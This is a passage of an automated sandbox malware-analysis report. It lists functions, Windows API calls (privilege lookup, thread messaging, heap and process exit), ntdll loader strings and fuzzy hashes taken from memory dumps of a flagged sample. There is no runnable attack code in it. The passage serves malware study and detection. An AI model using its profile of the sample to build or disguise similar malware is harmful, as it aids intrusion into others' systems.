                                            control_flow_graph 258 408393-40839d 259 408361-40836e PostThreadMessageW 258->259 260 40839f 258->260 261 408370-40838a call 40a480 259->261 262 40838d-408392 259->262 261->262
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 6eec51cd5cbc637ff8c9c64eda528c4bf6606480b924b56c6c79be685ab85bdc
                                            • Instruction ID: cea3dd1c2d4e03bef2d070cc7d37e22a11b6c84044ede041af9274f9f89d2149
                                            • Opcode Fuzzy Hash: 6eec51cd5cbc637ff8c9c64eda528c4bf6606480b924b56c6c79be685ab85bdc
                                            • Instruction Fuzzy Hash: 31E0D81124021424E211412D6C47FBFB60CAB81B15F04416FFE84E51C3EAD5445583E2
                                            Function 0041A7C1 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 272 41a7c1-41a7ea call 41af60 274 41a7ef-41a804 LookupPrivilegeValueW 272->274
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 77714e3c6bf9d2f8047f5b03dfd7af8205a22a2cc0ac5750984c1500fff48a6d
                                            • Instruction ID: c33c435de7c334a0b7e9268f3a7fb24ec9c0c4ea43ac9f6eedffb5eb7172e1fd
                                            • Opcode Fuzzy Hash: 77714e3c6bf9d2f8047f5b03dfd7af8205a22a2cc0ac5750984c1500fff48a6d
                                            • Instruction Fuzzy Hash: 9CE022B42002006BCB10DF14EC84EE73B78EF45714F208099FD8A6B682CD35A811CBB4
                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                            Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                            Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                            Function 0041A6AE Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 2c16a2eeeb6d3158863873f22b262cdbd8f6bdeb6eb6995631052757caa93ea6
                                            • Instruction ID: 720cee0962aa3085f22f9539f3278083e5f29018b8a1e3a680bf5fae4cad5eb8
                                            • Opcode Fuzzy Hash: 2c16a2eeeb6d3158863873f22b262cdbd8f6bdeb6eb6995631052757caa93ea6
                                            • Instruction Fuzzy Hash: 65D05E716003087BD620DF59CC86FD73BACDF49BA0F158068BA1C6B242C531FA00CAE2
                                            Function 01A12C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 071d166936be4f2bfce8a81c0919d83d111ec9b3aa0ba7d54bd286126126daba
                                            • Instruction ID: 50cc7fdd4b06dbc1ff1537f9ccf35833aa4eb420b04a32fdaeefe9ed5e38f955
                                            • Opcode Fuzzy Hash: 071d166936be4f2bfce8a81c0919d83d111ec9b3aa0ba7d54bd286126126daba
                                            • Instruction Fuzzy Hash: AEB09B719015D5C6DA11E7644609717794077D0701F26C072E3030641F473CC5D1E275

                                            Non-executed Functions

                                            Function 01A52349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            • Opcode ID: d8beb26c768c8ac0048f57db38556d952756448eb90ed5807941de20b8d6cd17
                                            • Instruction ID: 8dee8684c69aed758072463711b76814666b2d649ab3ffea75370ba881e03f51
                                            • Opcode Fuzzy Hash: d8beb26c768c8ac0048f57db38556d952756448eb90ed5807941de20b8d6cd17
                                            • Instruction Fuzzy Hash: 9C925971608342EBE761DF29C880B6BBBE8BF84754F04492EFA95D7251D770E844CB92
                                            Function 01A08620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                            Download Yara Rule
                                            Strings
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A4540A, 01A45496, 01A45519
                                            • Thread identifier, xrefs: 01A4553A
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A454CE
                                            • double initialized or corrupted critical section, xrefs: 01A45508
                                            • corrupted critical section, xrefs: 01A454C2
                                            • Critical section address, xrefs: 01A45425, 01A454BC, 01A45534
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01A45543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A454E2
                                            • undeleted critical section in freed memory, xrefs: 01A4542B
                                            • Invalid debug info address of this critical section, xrefs: 01A454B6
                                            • 8, xrefs: 01A452E3
                                            • Address of the debug info found in the active list., xrefs: 01A454AE, 01A454FA
                                            • Critical section address., xrefs: 01A45502
                                            • Critical section debug info address, xrefs: 01A4541F, 01A4552E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            • Opcode ID: ecaabe5b60de92aa819e75cbffcfd0f986b1c6e39f02b17e32f44a2c584af631
                                            • Instruction ID: 3cf46507af150452d4eb05f4a92b56837c21ac4b2657287a684a316edded8500
                                            • Opcode Fuzzy Hash: ecaabe5b60de92aa819e75cbffcfd0f986b1c6e39f02b17e32f44a2c584af631
                                            • Instruction Fuzzy Hash: 948190B1E41348EFDB20CF99C985BAEBBB9BB88B14F244119F509B7280D375A941CB50
                                            Function 01A029F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A42412
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A424C0
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A42506
                                            • @, xrefs: 01A4259B
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A42624
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A4261F
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A422E4
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A42602
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A425EB
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A42498
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A42409
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: b3664140be7aad7b8a2b8a7d4213f599fb6322aa78bf8e7a36f1969b135882c9
                                            • Instruction ID: 8f52da6abc28dd7c059537f3c90e6b571761d13930fd9e859483bc2e3264e46c
                                            • Opcode Fuzzy Hash: b3664140be7aad7b8a2b8a7d4213f599fb6322aa78bf8e7a36f1969b135882c9
                                            • Instruction Fuzzy Hash: 110251F1D002299BDB31DB54DD84BE9B7B8AF94704F0441EAE60DA7281DB70AE84CF59
                                            Function 01A78B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: bc6f0a6abf60b7c4fb24c01d09977ec1b87e4538ac5faa5e2730ae8707c818bf
                                            • Instruction ID: 8717eb50faffba8778b03a482ca60ec30bcc05cb103e581e7faaa962be17d5b0
                                            • Opcode Fuzzy Hash: bc6f0a6abf60b7c4fb24c01d09977ec1b87e4538ac5faa5e2730ae8707c818bf
                                            • Instruction Fuzzy Hash: D651BD716043019FD329CF588D89BABBBECFF94640F54491DAA99C3241E778D608CBD2
                                            Function 01A80274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 4b03f4f8436df784bc6f448d1f7439d6f9436834abf0a42821192ca9cee6bbf9
                                            • Instruction ID: 5e988863c0ea199c66415476446fcef22f371556ef440044035f67cfa2053ded
                                            • Opcode Fuzzy Hash: 4b03f4f8436df784bc6f448d1f7439d6f9436834abf0a42821192ca9cee6bbf9
                                            • Instruction Fuzzy Hash: 58D12235600681DFDB26EF68C511AADBBF1FF89714F08805DF48AAB252C734D949CB25
                                            Function 01A589B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                            Download Yara Rule
                                            Strings
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A58A67
                                            • VerifierDebug, xrefs: 01A58CA5
                                            • HandleTraces, xrefs: 01A58C8F
                                            • AVRF: -*- final list of providers -*- , xrefs: 01A58B8F
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A58A3D
                                            • VerifierDlls, xrefs: 01A58CBD
                                            • VerifierFlags, xrefs: 01A58C50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: 8fad858edfea512346484bc1c7bd1fe8311c12abe0061c5bdf636e16d058d6f9
                                            • Instruction ID: ba9f0d79ffb40c63649aff7258dd4d1625fe3dfe4d619c9436a8074bbd5fff61
                                            • Opcode Fuzzy Hash: 8fad858edfea512346484bc1c7bd1fe8311c12abe0061c5bdf636e16d058d6f9
                                            • Instruction Fuzzy Hash: 409123B2A09702EFD762DF2AC980B6B77E9AB94B14F05041CFE496B241D778EC05C791
                                            Function 019DEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: 7a4f4ee729f67654c9b4c54c8485d8e9ba84539f22e627ce631c66779bd2762d
                                            • Instruction ID: 968a481a96634e1cb5b9dcb825774133842d8a4bf43891430ea9d5fbe2806f00
                                            • Opcode Fuzzy Hash: 7a4f4ee729f67654c9b4c54c8485d8e9ba84539f22e627ce631c66779bd2762d
                                            • Instruction Fuzzy Hash: 8EA24E74A056298FDB65CF19CD88BADBBB5BF89304F1482E9E50DA7251DB349E81CF00
                                            Function 01A063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: c6b710a8c54a41c46a0380737dd799552ccc60418eb4699091c11d40200360f7
                                            • Instruction ID: 1689b2d523880a5cc795b0333d97dae1b75922927b9caa9a4a9a039296ad03ea
                                            • Opcode Fuzzy Hash: c6b710a8c54a41c46a0380737dd799552ccc60418eb4699091c11d40200360f7
                                            • Instruction Fuzzy Hash: 42914D70F003159FEB36DF58EA84BAA7BB1FF94B18F154129E5086B2C2D775A802C791
                                            Function 019C645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                            Download Yara Rule
                                            Strings
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A29A01
                                            • apphelp.dll, xrefs: 019C6496
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A29A11, 01A29A3A
                                            • LdrpInitShimEngine, xrefs: 01A299F4, 01A29A07, 01A29A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A29A2A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A299ED
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: 2f729f4f6922ceb7a81c12092485bb7087a75ebfa177190855ce6e0f9b48c80a
                                            • Instruction ID: 47f28e9d4464f859a19eabe231900acb9cbdc218f80855b8ce4c9c42165608f9
                                            • Opcode Fuzzy Hash: 2f729f4f6922ceb7a81c12092485bb7087a75ebfa177190855ce6e0f9b48c80a
                                            • Instruction Fuzzy Hash: 3251BF716083149FE721DF28D985AAB77E8FFC4B48F14491DF589972A0D630E905CB93
                                            Function 01A0C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01A48181, 01A481F5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A0C6C3
                                            • LdrpInitializeImportRedirection, xrefs: 01A48177, 01A481EB
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A481E5
                                            • LdrpInitializeProcess, xrefs: 01A0C6C4
                                            • Loading import redirection DLL: '%wZ', xrefs: 01A48170
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 92132bdbf6474fcb733faa0039ab56eda0b307146097f3d621354e8f0db6cec5
                                            • Instruction ID: 99ea1a669e5dd2727031a7572e9d30e92da6e815ef3539bc626aed25b6163d7f
                                            • Opcode Fuzzy Hash: 92132bdbf6474fcb733faa0039ab56eda0b307146097f3d621354e8f0db6cec5
                                            • Instruction Fuzzy Hash: 81312771744302AFC224EF68EE46E2A77E4FFD4B20F05055CF9486B295E620EC04C7A2
                                            Function 01A02674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A421BF
                                            • RtlGetAssemblyStorageRoot, xrefs: 01A42160, 01A4219A, 01A421BA
                                            • SXS: %s() passed the empty activation context, xrefs: 01A42165
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A42178
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A42180
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A4219F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: b532928f8b6c9329ea22ec0dc9077ff3ce271e60b600d80aa22e6f04f48ad9d4
                                            • Instruction ID: e3ec48d875530fa7fdcfd4ae9f38f7b4535cd630fe021650975cf5c9b0987e3d
                                            • Opcode Fuzzy Hash: b532928f8b6c9329ea22ec0dc9077ff3ce271e60b600d80aa22e6f04f48ad9d4
                                            • Instruction Fuzzy Hash: CE312B76F403157BF7228A9AAD85FAF7B78DBD4B90F05015BBB0877180D2709A00C7A1
                                            Function 01A1096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 01A12DF0: LdrInitializeThunk.NTDLL ref: 01A12DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10D74
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: 03a2bcb0d8fecec6182a77927949690984b6be6c9cba9fdf85cd310a9207997d
                                            • Instruction ID: 67362d918a0d9bb40659a7c954f3d9b128f29fe6ea647fbb1b85c6bcfe312b83
                                            • Opcode Fuzzy Hash: 03a2bcb0d8fecec6182a77927949690984b6be6c9cba9fdf85cd310a9207997d
                                            • Instruction Fuzzy Hash: FC427C75900705DFDB21CF28C980BAAB7F5BF48314F1485AAE989DB245D770EA85CF60
                                            Function 019DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: e8900a0951b2430132872e022b560742d23bdea7eb3a114e7daed52532fd6987
                                            • Instruction ID: 9f091adef4941438dde8b2b93e8e8cad907a79718e3c7e745e41bf8893375c19
                                            • Opcode Fuzzy Hash: e8900a0951b2430132872e022b560742d23bdea7eb3a114e7daed52532fd6987
                                            • Instruction Fuzzy Hash: 4CC19C74208386CFD721CF58C144B6AB7E4FF84704F04896AF999CB291E738CA59CB56
                                            Function 01A08402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A0855E
                                            • @, xrefs: 01A08591
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A08421
                                            • LdrpInitializeProcess, xrefs: 01A08422
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: 09714579953658d79de7e3a25d96fb2f7a5f773de233d711ec45d64bb09cddf8
